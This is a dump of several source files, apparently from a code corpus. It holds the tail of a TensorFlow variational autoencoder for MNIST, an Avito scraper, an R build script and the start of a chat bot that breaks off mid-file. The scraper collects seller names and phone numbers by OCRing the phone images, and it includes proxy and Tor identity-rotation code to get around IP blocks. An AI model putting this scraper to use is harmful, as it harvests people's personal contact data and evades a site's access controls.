S_whiten = S - tf.expand_dims(S_max, 1)\n qz = tf.exp(S_whiten) / tf.expand_dims(tf.reduce_sum(tf.exp(S_whiten), 1), 1)\n # Summarize the S loss\n # S_loss = -tf.reduce_sum(tf.log(tf.reduce_sum(tf.exp(S), 1)))\n S_loss = -tf.reduce_sum(S_max) - tf.reduce_sum(tf.log(tf.reduce_sum(tf.exp(S - tf.expand_dims(S_max, 1)), 1) + epsilon))\n return S_loss, qz, S\n\ndef gaussian_mixture_pdf(mu, sigma, x, pi):\n mu_expand = tf.reshape(tf.transpose(mu), [FLAGS.T, 1, 1, FLAGS.hidden_size])\n sigma_expand = tf.reshape(tf.transpose(sigma), [FLAGS.T, 1, 1, FLAGS.hidden_size])\n return tf.reduce_sum(1 / tf.sqrt(tf.reduce_prod(sigma_expand, 3)) \n * tf.exp(-0.5 * tf.reduce_sum(tf.square(x - mu_expand) / sigma_expand, 3)) * tf.reshape(pi, [-1, 1, 1]), 0)\n\ndef get_marginal_likelihood(yt, mean_yt, xt, s, alpha, beta, eta_mu, eta_sigma, eps, sigma_px, epsilon = 1e-8):\n yt_expand = tf.expand_dims(yt, 0)\n mean_yt = tf.reshape(mean_yt, [s, FLAGS.batch_size, 784])\n xt = tf.reshape(xt, [1, s, FLAGS.batch_size, FLAGS.hidden_size])\n # p_ygivenx = tf.reduce_prod(tf.pow(mean_yt, yt_expand) * tf.pow(1 - mean_yt, 1 - yt_expand), axis=2)\n v = alpha / (alpha + beta)\n pi = tf.concat(0, [v, [1.0]]) * tf.concat(0, [[1.0], tf.cumprod(1 - v)])\n p_x = gaussian_mixture_pdf(eta_mu, tf.square(eta_sigma) + tf.square(sigma_px), xt, pi)\n log_p_y_s = tf.reduce_sum(yt_expand * tf.log(mean_yt + epsilon) \\\n + (1.0 - yt_expand) * tf.log(1.0 - mean_yt + epsilon), 2) \\\n + tf.log(p_x) \\\n + 0.5 * tf.reduce_sum(tf.square(eps), 2)\n log_p_y_s_max = tf.reduce_max(log_p_y_s, reduction_indices=0)\n log_p_y = tf.log(tf.reduce_mean(tf.exp(log_p_y_s - log_p_y_s_max), 0)) + log_p_y_s_max\n return tf.reduce_mean(log_p_y)\n\nif __name__ == \"__main__\":\n data_directory = os.path.join(FLAGS.working_directory, \"MNIST\")\n if not os.path.exists(data_directory):\n os.makedirs(data_directory)\n mnist = input_data.read_data_sets(data_directory, one_hot=False)\n train, val, test = mnist.train.images, mnist.validation.images, mnist.test.images \n train_labels, val_labels, test_labels = mnist.train.labels, mnist.validation.labels, mnist.test.labels\n mnist_train = make_dataset(train, train_labels)\n mnist_val = make_dataset(val, val_labels)\n mnist_test = make_dataset(test, test_labels)\n \n N = mnist_train.num_examples\n input_tensor = tf.placeholder(tf.float32, [FLAGS.batch_size, 28 * 28])\n\n with tf.variable_scope(\"encoder\") as scope:\n mean_x, logcov_x = encoder(input_tensor)\n with tf.variable_scope(\"decoder\") as scope:\n output_tensor, _, _ = decoder(mean_x, logcov_x)\n\n with tf.variable_scope(\"encoder\", reuse=True) as scope:\n mean_xt, logcov_xt = encoder(input_tensor)\n with tf.variable_scope(\"decoder\", reuse=True) as scope:\n mean_yt, xt, eps = decoder(mean_xt, logcov_xt, FLAGS.s)\n\n ''' edit by hao'''\n # first, get the reconstruction term E_q(X|Y) log p(Y|X)\n # which is the cross entory loss between output and input\n rec_loss = 1 / FLAGS.batch_size * get_reconstruction_cost(output_tensor, input_tensor)\n\n # second, get the q(v|Y) reg loss E_q log \\frac{q(v|alpha, beta)}{q(v|Y)}\n qv_alpha = tf.Variable((1 / (FLAGS.T - np.arange(1, FLAGS.T))).astype(np.float32), name = \"qv_alpha\") # vi parameters\n qv_beta = tf.Variable(tf.ones([FLAGS.T - 1]), name = \"qv_beta\") # vi parameters\n # alpha_0 = (1 / (FLAGS.T - np.arange(1, FLAGS.T))).astype(np.float32)\n alpha_0 = np.ones([FLAGS.T - 1]).astype(np.float32)\n beta_0 = 100 * np.ones([FLAGS.T - 1]).astype(np.float32)\n qv_reg_loss = 1 / FLAGS.batch_size * get_qv_reg_loss(qv_alpha, qv_beta, alpha_0, beta_0)\n\n # third, get the q(\\eta|Y) reg loss E_q log \\frac{q(\\eta|\\mu_0, \\sigma_0^2)}{q(\\eta | Y)}\n qeta_mu = tf.Variable(tf.random_uniform([FLAGS.hidden_size, FLAGS.T]), name = 'qeta_mu') # vi parameters \n qeta_sigma = tf.Variable(tf.random_uniform([FLAGS.hidden_size, FLAGS.T]), name = 'qeta_sigma') # vi parameters\n qeta_reg_loss = 1 / FLAGS.batch_size * get_qeta_reg_loss(qeta_mu, qeta_sigma)\n\n # forth, get the remained loss E_q log \\frac {p(z|v) p(x|z,y)} {q(z) q(x|y)}\n sigma_px = tf.Variable(tf.ones([FLAGS.hidden_size, FLAGS.T]), name = 'sigma_px', trainable=False)\n S_loss, qz, S = get_S_loss_hao(mean_x, logcov_x, qv_alpha, qv_beta, qeta_mu, qeta_sigma, sigma_px)\n S_loss = 1 / FLAGS.batch_size * S_loss \n regularizer = - tf.reduce_sum(tf.log(qz + 1e-8) * qz) / FLAGS.batch_size\n qz_all = tf.reduce_mean(qz, axis = 0)\n regularizer_all = tf.reduce_sum(tf.log(qz_all + 1e-8) * qz_all)\n '''END edit by hao'''\n\n with tf.variable_scope(\"decoder\", reuse=True) as scope:\n samples = sample(qeta_mu, sigma_px)\n\n vae_loss = rec_loss #+ tf.reduce_sum(0.5 * (tf.square(mean_x) + tf.exp(logcov_x) - logcov_x - 1.0)) / FLAGS.batch_size\n overall_loss = qv_reg_loss + qeta_reg_loss + rec_loss + S_loss + regularizer * 10 + regularizer_all * 100\n log_p_yt = get_marginal_likelihood(input_tensor, mean_yt, xt, FLAGS.s, qv_alpha, qv_beta, qeta_mu, qeta_sigma, eps, sigma_px)\n # Create optimizers\n encoder_trainables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='encoder')\n decoder_trainables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='decoder')\n updates_per_epoch = int(N / FLAGS.batch_size)\n\n # create the optimizer\n global_step = tf.Variable(0, trainable=False)\n #learning_rate = tf.train.exponential_decay(FLAGS.learning_rate, global_step, updates_per_epoch * 50, 1.0, staircase = True)\n optimizer = tf.train.AdamOptimizer(learning_rate = 0.0003, beta1 = 0.95, beta2 = 0.999, epsilon=1.0)\n pre_optimizer = tf.train.AdamOptimizer(learning_rate = 0.01, beta1 = 0.95, beta2 = 0.999, epsilon=1.0)\n pretraining_step = pre_optimizer.minimize(vae_loss, var_list = encoder_trainables + decoder_trainables)\n learning_step = optimizer.minimize(overall_loss, var_list = encoder_trainables + decoder_trainables + [qeta_mu, qeta_sigma, qv_alpha, qv_beta], global_step = global_step)\n\n #global_step_vi = tf.Variable(0, trainable=False)\n #learning_rate_vi = tf.train.exponential_decay(FLAGS.learning_rate, global_step_vi, updates_per_epoch * 50, 0.9, staircase = True)\n #optimizer_vi = tf.train.AdamOptimizer(learning_rate_vi, epsilon=1.0)\n #learning_step_vi = optimizer.minimize(overall_loss, var_list = [qv_alpha, qv_beta], global_step = global_step_vi)\n\n tf.summary.scalar('overall_loss', overall_loss)\n tf.summary.scalar('rec_loss', rec_loss)\n tf.summary.scalar('S_loss', S_loss)\n tf.summary.scalar('qv_reg_loss', qv_reg_loss)\n tf.summary.scalar('qeta_reg_loss', qeta_reg_loss)\n merged = tf.summary.merge_all()\n loader = tf.train.Saver(encoder_trainables + decoder_trainables + [qv_alpha, qv_beta, qeta_mu, qeta_sigma])\n \n save_dir = 'tb/dp_vae_mnist/' + FLAGS.logdir\n init = tf.initialize_all_variables()\n with tf.Session() as sess:\n train_writer = tf.summary.FileWriter(save_dir, sess.graph)\n sess.run(init)\n\n print(\"Pretraining the dp-vae model\")\n for iii in range(100):\n ve_loss = 0.0\n mnist_train._index_in_epoch = 0\n for i in range(updates_per_epoch):\n x, _ = mnist_train.next_batch(FLAGS.batch_size)\n _, vae_loss_ = sess.run([pretraining_step, vae_loss], {input_tensor: x}) \n ve_loss += vae_loss_\n ve_loss /= updates_per_epoch\n print(\"Pretrain vae loss: %f\" % (ve_loss))\n if iii % 10 == 0:\n mnist_train._index_in_epoch = 0\n features = np.zeros([N, FLAGS.hidden_size])\n labels = np.zeros((N))\n for i in range(updates_per_epoch):\n x, y = mnist_train.next_batch(FLAGS.batch_size)\n [mean_x_] = sess.run([mean_x], {input_tensor: x})\n features[i * FLAGS.batch_size: (i + 1) * FLAGS.batch_size, :] = mean_x_\n labels[i * FLAGS.batch_size: (i + 1) * FLAGS.batch_size] = y\n\n model = BayesianGaussianMixture(n_components = FLAGS.T, max_iter = 300, covariance_type = 'diag', weight_concentration_prior=2)\n model.fit(features)\n preds = model.predict(features)\n print(\"------------> Fit a Bayesian GMM: acc: %f, nmi: %f\" % (cluster_acc(preds, labels), cluster_nmi(preds, labels)))\n\n # init other variational distributions\n assign_op = qeta_mu.assign(model.means_.T)\n sess.run(assign_op)\n # assign_op = sigma_px.assign(model.covariances_.T)\n # sess.run(assign_op)\n\n # init the encoder and decoder parameters\n #print(\"restore the encoder and decoder parameters\")\n #loader.restore(sess, \"trained/initialization.ckpt\")\n print(\"Training the dp-vae model\")\n best_train_rec, best_test_rec, best_val_rec = 999999, 9999999, 9999999\n best_val_heldout, best_test_heldout = 999999, 999999\n mnist_train._index_in_epoch = 0\n for epoch in range(FLAGS.max_epoch):\n # first, let train the encoder and decoder for a while:\n overall_loss_total, rec_loss_total, S_loss_total, qeta_reg_loss_total, qv_reg_loss_total = 0.0, 0.0, 0.0, 0.0, 0.0\n stats = np.zeros([FLAGS.T])\n for i in range(updates_per_epoch):\n x, _ = mnist_train.next_batch(FLAGS.batch_size)\n _, overall_loss_, rec_loss_, S_loss_, qeta_reg_loss_, qv_reg_loss_, qz_, summary, step = sess.run([learning_step, overall_loss, rec_loss, S_loss, qeta_reg_loss, qv_reg_loss, qz, merged, global_step], {input_tensor: x}) \n overall_loss_total += overall_loss_ \n #print(\"epoch %d: iter %d, rec_loss: %f, S_loss: %f, qeta_loss: %f, qv_loss: %f\" % (epoch, i, rec_loss_, S_loss_, qeta_reg_loss_, qv_reg_loss_))\n rec_loss_total += rec_loss_\n S_loss_total += S_loss_\n qeta_reg_loss_total += qeta_reg_loss_\n qv_reg_loss_total += qv_reg_loss_\n train_writer.add_summary(summary, step)\n assignment_ = np.zeros((FLAGS.batch_size, FLAGS.T)) \n assignment_[np.arange(FLAGS.batch_size), np.argmax(qz_, axis = 1)] = 1\n stats += np.sum(assignment_, axis = 0)\n overall_loss_total = overall_loss_total / updates_per_epoch \n rec_loss_total = rec_loss_total / updates_per_epoch\n S_loss_total = S_loss_total / updates_per_epoch\n qeta_reg_loss_total = qeta_reg_loss_total / updates_per_epoch\n qv_reg_loss_total = qv_reg_loss_total / updates_per_epoch\n if rec_loss_total <= best_train_rec:\n best_train_rec = rec_loss_total\n print(\"train ELBO: %f, rec_LL: %f, S_LL: %f, qeta_reg_LL: %f, qv_reg_LL: %f, epoch %d...\" \n % (-overall_loss_total, -rec_loss_total, -S_loss_total, -qeta_reg_loss_total, -qv_reg_loss_total, epoch))\n print(\"Assigments: \", stats)\n\n def eval_ELBO(dataset, name):\n dataset._index_in_epoch = 0\n num_iter = int(dataset.num_examples / FLAGS.batch_size)\n overall_loss_total, rec_loss_total, S_loss_total, qeta_reg_loss_total, qv_reg_loss_total, heldout_ll = 0.0, 0.0, 0.0, 0.0, 0.0, 0.0\n for i in range(num_iter):\n x, _ = dataset.next_batch(FLAGS.batch_size)\n overall_loss_, rec_loss_, S_loss_, qeta_reg_loss_, qv_reg_loss_ , log_p_yt_\\\n\t\t\t\t\t\t\t\t\t\t = sess.run([overall_loss, rec_loss, S_loss, qeta_reg_loss, qv_reg_loss, log_p_yt], \\\n\t\t\t\t\t\t \t\t\t\t\t\t\t\t\t\t{input_tensor: x}) \n overall_loss_total += overall_loss_ \n #print(\"epoch %d: iter %d, rec_loss: %f, S_loss: %f, qeta_loss: %f, qv_loss: %f\" % (epoch, i, rec_loss_, S_loss_, qeta_reg_loss_, qv_reg_loss_))\n rec_loss_total += rec_loss_\n S_loss_total += S_loss_\n qeta_reg_loss_total += qeta_reg_loss_\n qv_reg_loss_total += qv_reg_loss_\n heldout_ll += log_p_yt_\n overall_loss_total = overall_loss_total / num_iter \n rec_loss_total = rec_loss_total / num_iter\n S_loss_total = S_loss_total / num_iter\n qeta_reg_loss_total = qeta_reg_loss_total / num_iter\n qv_reg_loss_total = qv_reg_loss_total / num_iter\n heldout_ll = heldout_ll / num_iter\n print(\"%s ELBO: %f, rec_LL: %f, S_LL: %f, qeta_reg_LL: %f, qv_reg_LL: %f, heldout_nll: %f...\" \n % (name, -overall_loss_total, -rec_loss_total, -S_loss_total, -qeta_reg_loss_total, -qv_reg_loss_total, heldout_ll))\n return rec_loss_total, heldout_ll\n\n val_rec, val_heldout = eval_ELBO(mnist_val, 'val')\n test_rec, test_heldout = eval_ELBO(mnist_test, 'test')\n if val_rec < best_val_rec:\n best_val_rec = val_rec\n if test_rec < best_test_rec:\n best_test_rec = test_rec\n if -val_heldout < best_val_heldout:\n best_val_heldout = -val_heldout\n if -test_heldout < best_test_heldout:\n best_test_heldout = -test_heldout\n\n if epoch % 20 == 0:\n [imgs] = sess.run([samples])\n imgs_folder = os.path.join(save_dir, 'imgs', str(epoch))\n if not os.path.exists(imgs_folder):\n os.makedirs(imgs_folder)\n for k in range(FLAGS.T):\n for j in range(int(FLAGS.batch_size / FLAGS.T)):\n imsave(os.path.join(imgs_folder, '%d_%d.png') % (k, j), imgs[k][j].reshape(28, 28))\n #evaluate the marginal likelihood.\n print(\"best train rec %f, val rec %f, test rec %f..\" % (-best_train_rec, -best_val_rec, -best_test_rec))\n print(\"best val heldout-ll %f, test heldout-ll %f..\" % (-best_val_heldout, -best_test_heldout))\n loader.save(sess, train_writer.get_logdir() + '/final_model.ckpt')\n train_writer.close()\n","sub_path":"dp-vae-mnist.py","file_name":"dp-vae-mnist.py","file_ext":"py","file_size_in_byte":20309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"94978123","text":"import socks\r\nimport socket\r\nimport urllib.request\r\nfrom urllib.request import urlopen, Request\r\nimport re\r\nfrom lxml import html\r\nimport time\r\nimport csv\r\nfrom selenium import webdriver\r\nfrom PIL import Image\r\nfrom pytesseract import image_to_string\r\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\r\nimport sys\r\nimport normalize_date\r\nfrom selenium.webdriver.firefox.firefox_profile import FirefoxProfile\r\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\r\nimport os\r\nimport contextlib\r\nfrom selenium.webdriver.common.proxy import *\r\nimport urllib3\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\n\r\n\r\n\r\n\r\n\"\"\"\r\nURLLIB PROXY\r\n\r\nproxy_support = urllib.request.ProxyHandler({'http' : '127.0.0.1:8118'})\r\nopener = urllib.request.build_opener(proxy_support)\r\nurllib.request.install_opener(opener)\r\n\"\"\"\r\n\r\n\"\"\"\r\nTOR CONNECTION\r\n\r\ndef send(s, string):\r\n print('>', string)\r\n s.send(bytes(string.encode('utf8')))\r\n s.send(b'\\n')\r\n data = recv(s)\r\n if not data.startswith('250 '):\r\n raise Exception()\r\n print(data)\r\n \r\ndef recv(s):\r\n return s.recv(1024).decode('utf8')\r\n\r\ndef create_connection(address, timeout=None, source_address=None):\r\n sock = socks.socksocket()\r\n sock.connect(address)\r\n return sock\r\n\r\n@contextlib.contextmanager\r\ndef connectTor():\r\n socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, \"127.0.0.1\", 9050, True)\r\n old_socket = socket.socket\r\n old_connection = socket.create_connection\r\n socket.socket = socks.socksocket\r\n socket.create_connection = create_connection\r\n yield\r\n socket.socket = old_socket \r\n socket.create_connection = old_connection\r\n\r\ndef newIdentity(): \r\n raw_password = 'over' \r\n with socket.socket() as s:\r\n s.connect(('127.0.0.1', 9051))\r\n send(s, 'authenticate \"%s\"' % raw_password)\r\n send(s, 'setevents signal')\r\n send(s, 'signal newnym')\r\n\"\"\"\r\n\"\"\"\r\nEXCEPTIONS\r\n\"\"\"\r\nclass IPBlockedError(Exception):\r\n def __init__(self, text):\r\n self.txt = text\r\n\r\n\r\n\"\"\"\r\nPARSER\r\n\"\"\"\r\nclass AvitoParser(object):\r\n\r\n def __init__(self, proxy):\r\n self.page = \"\"\r\n self.proxy = proxy\r\n print('Proxy: ' + proxy)\r\n if proxy != 'no':\r\n proxy_support = urllib.request.ProxyHandler({'http' : proxy, 'https': proxy})\r\n opener = urllib.request.build_opener(proxy_support)\r\n urllib.request.install_opener(opener)\r\n fp = webdriver.FirefoxProfile(r'C:\\Users\\User\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\6ypz1xjt.default-release')\r\n binary = FirefoxBinary(r'C:\\Program Files\\Mozilla Firefox\\firefox.exe')\r\n self.driver = webdriver.Firefox(firefox_binary=binary, firefox_profile=fp)\r\n self.driver.delete_all_cookies()\r\n self.data = []\r\n self.data.append(['ID', 'Имя аккаунта', 'Название объявления', 'Дата', 'Адрес', 'Телефон', 'Очищенный телефон', 'URL'])\r\n\r\n def takeScreenshot(self):\r\n self.driver.save_screenshot('avito_screenshot.png')\r\n\r\n def telRecon(self):\r\n image = Image.open('tel.gif')\r\n tel_string = image_to_string(image)\r\n return tel_string\r\n\r\n def crop(self, location, size):\r\n image = Image.open('avito_screenshot.png')\r\n x = location['x']\r\n y = location['y']\r\n width = size['width']\r\n height = size['height']\r\n image.crop((x, y, x+width, y+height)).save('tel.gif')\r\n\r\n def readPage(self, url):\r\n #with connectTor():\r\n self.driver.get(url)\r\n print(\"URL: \" + str(url))\r\n fp = urllib.request.urlopen(url)\r\n mybytes = fp.read()\r\n html = mybytes.decode('utf8')\r\n self.page = html\r\n fp.close()\r\n \"\"\"\r\n #headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'}\r\n http = urllib3.ProxyManager(\"http://\" + self.proxy)#127.0.0.1:8118\")\r\n req = http.request('GET', url, headers = {'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\"})\r\n #req = Request(url=url, headers=headers) \r\n html = req.read() \r\n html = html.decode('utf8')\r\n self.page = html\r\n \"\"\"\r\n\r\n def printPage(self):\r\n print(self.page)\r\n\r\n def getPages(self, url):\r\n self.readPage(url)\r\n tree = html.fromstring(self.page)\r\n pages = tree.xpath('//a[@class=\"pagination-page\"]/@href')\r\n last_page_num = ''\r\n try:\r\n last_page_num = int(pages[-1].split('?')[1].split('&')[0].split('=')[1])\r\n except IndexError:\r\n print('[ERR] IP temprorary blocked. Try again later.')\r\n sys.exit()\r\n print(\"[INF] Pages for scrapping items URLs: \" + str(last_page_num))\r\n pages = []\r\n if '?q=' in url:\r\n for i in range(1, last_page_num+1):\r\n pages.append(url + '&p=' + str(i))\r\n else:\r\n for i in range(1, last_page_num+1):\r\n pages.append(url + '?p=' + str(i))\r\n items_pages = []\r\n try:\r\n for page in pages:\r\n items = []\r\n try:\r\n self.readPage(page)\r\n tree = html.fromstring(self.page)\r\n items = tree.xpath('//a[@class=\"snippet-link\"]/@href')\r\n except Exception as e:\r\n print('[ERR] Scrapping failed: ' + str(e))\r\n continue \r\n for item in items:\r\n print('[INF] Item found: ' + item)\r\n items_pages.append('https://www.avito.ru' + item)\r\n time.sleep(2)\r\n except KeyboardInterrupt:\r\n print('[INF] Keyboard interrupted. Saving data.')\r\n return items_pages\r\n return items_pages\r\n\r\n def parseHtml(self, category):\r\n line = []\r\n firewall = None\r\n tree = html.fromstring(self.page)\r\n try:\r\n firewall = tree.xpath('//h2[@class=\"firewall-title\"]/text()')[0]\r\n if str(firewall) == 'Доступ с Вашего IP временно ограничен': \r\n raise IPBlockedError('IP Blocked. Closing app.')\r\n except IPBlockedError:\r\n raise IPBlockedError('IP Blocked 1. Closing app.')\r\n except Exception as e:\r\n #print('[INF] IP OK ' + str(e))\r\n print('')\r\n try:\r\n firewall = tree.xpath('//h1/text()')\r\n #print('fw: ' + str(firewall))\r\n if str(firewall) == 'Доступ с вашего IP-адреса временно ограничен': #Доступ с вашего IP-адреса временно ограничен\r\n raise IPBlockedError('IP Blocked 2. Closing app.')\r\n except IPBlockedError:\r\n raise IPBlockedError('IP Blocked. Closing app.')\r\n except Exception as e:\r\n print('[INF] IP OK ' + str(e))\r\n #ITEM ID\r\n item_id = '-'\r\n try:\r\n item_id = tree.xpath('//span[@data-marker=\"item-view/item-id\"]/text()')[0]\r\n if '№' in item_id:\r\n item_id = item_id.replace('№', '')\r\n item_id = item_id.strip()\r\n except Exception as e:\r\n item_id = '-'\r\n line.append(item_id)\r\n #ACC NAME\r\n name = '-'\r\n try:\r\n name = tree.xpath('//div[@class=\"seller-info-value\"]/div/a/text()')[0].split('\\n')[1].strip()\r\n except Exception:\r\n name = '-'\r\n line.append(name)\r\n #AD NAME\r\n ad = '-'\r\n try:\r\n ad = tree.xpath('//span[@class=\"title-info-title-text\"]/text()')[0].strip()\r\n except Exception:\r\n ad = '-'\r\n line.append(ad)\r\n #DATE\r\n date = '-'\r\n try:\r\n date = tree.xpath('//div[@class=\"title-info-metadata-item-redesign\"]/text()')[0].split('\\n')[1].strip().replace('\\xa0', ' ')\r\n date = normalize_date.normalize_date(date)\r\n except Exception as e:\r\n date = '-'\r\n line.append(date)\r\n #REGION\r\n region = '-'\r\n try:\r\n region = tree.xpath('//span[@class=\"item-address__string\"]/text()')[0].split('\\n')[1].strip()\r\n except Exception:\r\n region = '-'\r\n line.append(region)\r\n #TELEPHONE\r\n tel = '-'\r\n try:\r\n if category == 1:\r\n button = self.driver.find_element_by_xpath('//a[@class=\"button item-phone-button js-item-phone-button button-origin button-origin-blue button-origin_full-width button-origin_large-extra item-phone-button_hide-phone item-phone-button_card js-item-phone-button_card\"]')\r\n elif category == 2:\r\n #button = self.driver.find_element_by_xpath('//div[@class=\"js-item-phone-react\"]')\r\n button = WebDriverWait(self.driver, 3).until(EC.element_to_be_clickable((By.XPATH, '//div[@class=\"js-item-phone-react\"]')))\r\n button.click()\r\n time.sleep(5)\r\n self.takeScreenshot()\r\n if category == 1:\r\n image = self.driver.find_element_by_xpath('//div[@class=\"item-phone-big-number js-item-phone-big-number\"]/img')\r\n elif category == 2:\r\n image = self.driver.find_element_by_xpath('//img[@class=\"contacts-phone-3KtSI\"]')\r\n location = image.location\r\n size = image.size\r\n self.crop(location, size)\r\n tel = self.telRecon()\r\n tel.strip()\r\n counter_tel = 0\r\n while tel[0] != '8' and counter_tel < 5:\r\n print('[WRN] Screenshot failed. Waiting 5 seconds and trying again.')\r\n button.click()\r\n time.sleep(5)\r\n self.takeScreenshot()\r\n if category == 1:\r\n image = self.driver.find_element_by_xpath('//div[@class=\"item-phone-big-number js-item-phone-big-number\"]/img')\r\n elif category == 2:\r\n image = self.driver.find_element_by_xpath('//img[@class=\"contacts-phone-3KtSI\"]')\r\n location = image.location\r\n size = image.size\r\n self.crop(location, size)\r\n tel = self.telRecon()\r\n tel.strip()\r\n counter_tel = counter_tel + 1\r\n if 'O' in tel:\r\n tel = tel.replace('O', '0')\r\n #CLEAN TEL\r\n clean_tel = tel\r\n if '-' in clean_tel:\r\n clean_tel = clean_tel.replace('-', '')\r\n if ' ' in clean_tel:\r\n clean_tel = clean_tel.replace(' ', '')\r\n if len(clean_tel) > 10:\r\n clean_tel = clean_tel[1:]\r\n if counter_tel >= 5:\r\n print('Tel recog error: 5 attempts failed')\r\n tel = '-'\r\n clean_tel = '-'\r\n except Exception as e:\r\n print('Tel recog error: ' + str(e))\r\n tel = '-'\r\n clean_tel = '-'\r\n line.append(tel)\r\n line.append(clean_tel)\r\n #URL\r\n line.append\r\n print(line)\r\n if len(line)+1 == len(self.data[0]):\r\n #self.data.append(line)\r\n return line\r\n else:\r\n print('Parse error. Scrapped data != needed data.')\r\n\r\n def printTable(self):\r\n for line in self.data:\r\n print(line)\r\n\r\n def outputInCsv(self, outdir, save_descriptor):\r\n filename = outdir + '/avito_' + save_descriptor + '.csv'\r\n with open(filename, \"w\", newline=\"\", encoding='utf8') as file:\r\n writer = csv.writer(file, delimiter=';')\r\n writer.writerows(self.data)\r\n\r\n def updateCsv(self, outdir, save_descriptor):\r\n filename = outdir + '/avito_' + save_descriptor + '.csv'\r\n self.data.remove(['ID', 'Имя аккаунта', 'Название объявления', 'Дата', 'Адрес', 'Телефон', 'Очищенный телефон', 'URL'])\r\n with open(filename, \"a\", newline=\"\", encoding='utf8') as file:\r\n writer = csv.writer(file, delimiter=';')\r\n writer.writerows(self.data)\r\n\r\n def loadDataFromCsv(self, csv_file):\r\n with open(csv_file, newline='', encoding='utf8') as csvfile:\r\n read_data = csv.reader(csvfile, delimiter=';')\r\n self.data.remove(['ID', 'Имя аккаунта', 'Название объявления', 'Дата', 'Адрес', 'Телефон', 'Очищенный телефон', 'URL'])\r\n for row in read_data:\r\n self.data.append(row)\r\n\r\n def cleanTableFromTrash(self):\r\n for dt in self.data:\r\n if len(dt) < 7:\r\n self.data.remove(dt)\r\n continue\r\n if len(dt[5]) > 15 or dt[5] == '-':\r\n self.data.remove(dt)\r\n\r\n\r\n\r\ndef compareItemsForUpdate(old_items, new_items):\r\n output = []\r\n booler = True\r\n for new_item in new_items:\r\n for old_item in old_items:\r\n if booler == False:\r\n continue\r\n if new_item == old_item:\r\n booler = False\r\n if booler == True:\r\n print('[INF] Found new item: ' + new_item)\r\n output.append(new_item)\r\n else:\r\n booler = True\r\n return output\r\n\r\n\r\n\r\n\r\n","sub_path":"avito_parser.py","file_name":"avito_parser.py","file_ext":"py","file_size_in_byte":13540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"265492391","text":"import os\nimport sys\nimport subprocess\nimport os.path\nimport fileinput\nimport re\nimport time\n\nimport Globals\n\nEX_OK = getattr(os, \"EX_OK\", 0)\n\nclass RLibrary:\n \"\"\"\n Build the R library\n \"\"\"\n def start(self):\n library_name = 'spm'\n binary_name = 'spm'\n if Globals.operating_system_ == 'windows':\n binary_name += '.exe'\n \n ## Check SPM is in your path. The R script needs it to get versions and that sort of information. \n if not os.path.exists(Globals.build_directory_ ):\n print('Looking for spm binary in ' + Globals.build_directory_ )\n print('\\n\\n*****************\\nERROR\\n*****************\\nSPM binary was not found. Cannot continue\\n\\n')\n return False\n ## CHG Dir to R library\n os.chdir(Globals.root_directory_ + \"/R-libraries/\")\n ## Build Namespace\n os.system(\"R --vanilla < SPM_make_version.R\")\n ## Run the oxygen\n os.system(\"R --vanilla < run-roxygen.R\") \n ## build package\n os.system(\"R CMD build --force spm\")\n if Globals.install_r_library == 'true':\n os.system(\"R CMD INSTALL --build spm\")\n os.system(\"R CMD check spm\")\n os.system(\"cp -f spm_\" + Globals.SPM_version_number + \"* \" + Globals.root_directory_ + \"/Build\")\n #os.system(\"R CMD build --force spmTest\")\n #os.system(\"R CMD INSTALL --build spmTest\")\n #os.system(\"R CMD check spmTest\")\n #os.system(\"mv -f spmTest_\" + Globals.SPM_version_number + \"* \" + Globals.root_directory_ + \"/Build\")\n return True\n","sub_path":"BuildSystem/buildtools/classes/RLibrary.py","file_name":"RLibrary.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"43257970","text":"import json, time, atexit, websocket, sys, traceback, threading, tools\n\nimport commands\n\ndef view_traceback(e):\n print(str(type(e))+\": \"+str(e))\n ex_type, ex, tb = sys.exc_info()\n traceback.print_tb(tb)\n del tb\n\nclass FinitBot(object):\n def __init__(self, config_fn):\n self.config_fn=config_fn\n with open(self.config_fn,'r') as config_fd:\n self.config=json.load(config_fd)\n with open(self.config[\"sensitive_file\"], 'r') as s_fd:\n self.config.update(json.load(s_fd))\n self.permissions=tools.PermissionsModel(self.config[\"permissions\"])\n\n def start(self):\n atexit.register(self.save_config)\n self.ws=websocket.WebSocketApp(\"wss://anvel.io/?authPath=%2Fapi%2Fwebsockets%2Fauth&instance_id=M7AdOTjPvJbBYKDU&token=\"+self.config[\"auth\"],\n on_message=self.on_message)\n threading.Thread(target=self.shell).start()\n threading.Thread(target=self.autosave, daemon=1).start()\n self.ws.run_forever()\n\n def autosave(self):\n while 1:\n time.sleep(1)\n self.save_config()\n\n def shell(self):\n channel=\"finit\"\n while 1:\n try:\n command=input(\"$\")\n if command.startswith(\"wssend\"):\n self.ws.send(command.replace(\"wssend \",\"\",1))\n if command.startswith(\"sc\"):\n channel=command.replace(\"sc \",\"\",1)\n if command.startswith(\"s\"):\n self.post_message(channel, command.replace(\"s \",\"\",1))\n if command.startswith(\"exit\"):\n self.ws.close()\n except BaseException:\n self.ws.close()\n return\n\n def ws_sendj(self, data):\n # print(\">>\"+json.dumps(data))\n self.ws.send(json.dumps(data))\n\n def on_message(self, sock, message):\n try:\n data=json.loads(message)\n print(data)\n if data[\"event\"]==\"client-message\":\n self.process_messages(data[\"data\"])\n if data[\"event\"]==\"member-added\":\n self.process_join(data[\"data\"], data[\"channel\"])\n if data[\"event\"]==\"connected\":\n print(\"Subscribing!\")\n for channel in self.config[\"channels\"]:\n self.ws_sendj({\"event\":\"subscribe\", \"channel\":\"pub_\"+channel})\n except BaseException as e:\n if isinstance(e, KeyboardInterrupt):sys.exit()\n view_traceback(e)\n\n def process_join(self, 